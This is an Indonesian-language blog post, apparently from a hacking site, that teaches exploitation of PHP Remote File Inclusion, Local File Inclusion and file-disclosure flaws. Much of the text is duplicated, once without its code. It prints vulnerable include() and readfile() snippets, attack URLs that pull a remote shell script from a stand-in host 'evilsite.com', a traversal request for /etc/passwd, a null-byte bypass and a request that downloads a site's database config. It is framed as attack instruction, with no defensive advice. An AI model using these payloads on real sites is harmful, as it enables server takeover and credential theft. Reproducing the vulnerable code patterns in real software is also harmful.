1. Remote File Inclusion
contoh script :
misal :
itu artinya isi dari index.php bakal di eksekusi kedalem get.php
phpshellcode : http://evilsite.com/evilscript.txt
exploitasi :
kita masukkin php shell code ke dalem get.php
caranya tinggal ubah index.php jadi URL phpshellcode kita.
kalo kita masukkin URL phpshellcode kita, nanti script akan berubah sementara jadi :
kadang ada script yang berisi :
jadi semisal kita include http://evilsite.com/evilscript.txt kita, bakal berubah URL-nya jadi http://evilsite.com/evilscript.txt.php
untuk menghilangkan .php di akhir URL shellcode kita, bisa kita tambah NULLBYTE ( ).
2. Local File Inclusion
contoh script :
sama kayak RFI. cuman kalo ini hanya berlaku buat include file di 1 server.
misal :
bisa juga kita pake NULLBYTE buat bypass.. sama kayak RFI.
3. Local File Disclosure/Download
contoh script :
kesalahan itu bisa dimanfaatkan untuk mendownload file sensitif seperti konfigurasi database.
misal :
CONTOH DALAM GAMBAR NEEEHHH!!!
isi vulnerable file..
![[Image: 1lfifile.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uXyBypPFhlLZZxS3yqQ6Z7iJP1iRx47o6p2qsoAQ0Vv_jWtxt4cxX3li4Ws1yVYhrQAC9b8yCepDpcXZypxyQKht9XCv87JuMwdcxI6PWPjLFvcwhL16g=s0-d)
berikut isi file yang mau kita eksekusi..
![[Image: 2isitext.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tqdDD-YwdQ_8tQAUeHrZG0nMQz8ZKiIVuOymY5v7gFYe3iMsoFr6bEynv2ZJLgdEylwnrhw9vt5huAzxn0jpnyL-MXjVHJihh3RZuB_d8V0G_OCj6YPio=s0-d)
berikut gambar file yang ter-eksekusi..
![[Image: 3executed.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vp-ouDlxT6FDHZ3stfCGF6x6qDszcgA8bqKXt0durYIO-MGSQuKWTSu_IMt2n1mR51jP7hztqxEvjNaADblpjrp2WesII_vgLk0-35yRDoQcizW6uZZJCV=s0-d)
berikut contoh pesan error LFI..
![[Image: 5gagallfi.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uTScipX-yBIehNWo9O0vD8In2tpu-H1jtY8dBm4KWZUrlxE1S8tskWmsxxSN40RNORuzJNY6wXQTGl5ErSB96rtCe0JoYmIDwuOFl449muZlPUKxVoiD7M=s0-d)
berikut contoh pesan error RFI
![[Image: 4errorrfi.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tVH6MQz3czwCjXd4JCAgLogyCcHr-k7ukQ-c3OOjUjxhVJoztJdgMv3z7Q9jyDoAuT1nq3sKZH9iR77EdtWOV1BXeRS0z3se7zP9KyPV1Q90_5ap4xdi_f=s0-d)
RFI gagal karena setting allow_url_include di php.ini OFF..
![[Image: 6phpini.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vp0lon9aT4-WiCjbAHV7ewgOi7jJCui7Rw6Pn8Mcc1ewzDva3kVpG3qLSD0Wvhp1-0sUsIdN_g1Bqi-4HZn0EgtGpnCU1fjUpL6KMc8Vqrl0J4aV9TMw=s0-d)
SEKIAN
contoh script :
Code:
<?php $page=$_GET['file'];
include($page);
?>
misal :
Code:
http://www.sh4dhckr.com/get.php?file=index.php
phpshellcode : http://evilsite.com/evilscript.txt
exploitasi :
kita masukkin php shell code ke dalem get.php
caranya tinggal ubah index.php jadi URL phpshellcode kita.
Code:
http://www.sh4dhckr.com/get.php?file=http://evilsite.com/evilscript.txt
kalo kita masukkin URL phpshellcode kita, nanti script akan berubah sementara jadi :
Code:
<?php $page="http://evilsite.com/evilscript.txt";
include($page);
?>
kadang ada script yang berisi :
Code:
<?php
$page=$_GET['page'];
include($page.'.php');
?>
jadi semisal kita include http://evilsite.com/evilscript.txt kita, bakal berubah URL-nya jadi http://evilsite.com/evilscript.txt.php
untuk menghilangkan .php di akhir URL shellcode kita, bisa kita tambah NULLBYTE ( ).
Code:
http://www.sh4dhckr.com/get.php?file=http://evilsite.com/evilscript.txt
2. Local File Inclusion
contoh script :
Code:
<?php
$page=$_GET['page'];
include('/pages/'.$page);
?>
sama kayak RFI. cuman kalo ini hanya berlaku buat include file di 1 server.
misal :
Code:
http://www.sh4dhckr.com/get.php?file=../../../../../../../../../../etc/passwd
bisa juga kita pake NULLBYTE buat bypass.. sama kayak RFI.
3. Local File Disclosure/Download
contoh script :
Code:
$file = $_SERVER["DOCUMENT_ROOT"]. $_REQUEST['file'];
header("Pragma: public");
header("Expires: 0");
header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
header("Content-Type: application/force-download");
header( "Content-Disposition: attachment; filename=".basename($file));
//header( "Content-Description: File Transfer");
@readfile($file);
die();
kesalahan itu bisa dimanfaatkan untuk mendownload file sensitif seperti konfigurasi database.
misal :
Code:
http://www.sh4dhckr.com/get.php?file=includes/config.php
CONTOH DALAM GAMBAR NEEEHHH!!!
isi vulnerable file..
berikut isi file yang mau kita eksekusi..
berikut gambar file yang ter-eksekusi..
berikut contoh pesan error LFI..
berikut contoh pesan error RFI
RFI gagal karena setting allow_url_include di php.ini OFF..
SEKIAN
Posting Komentar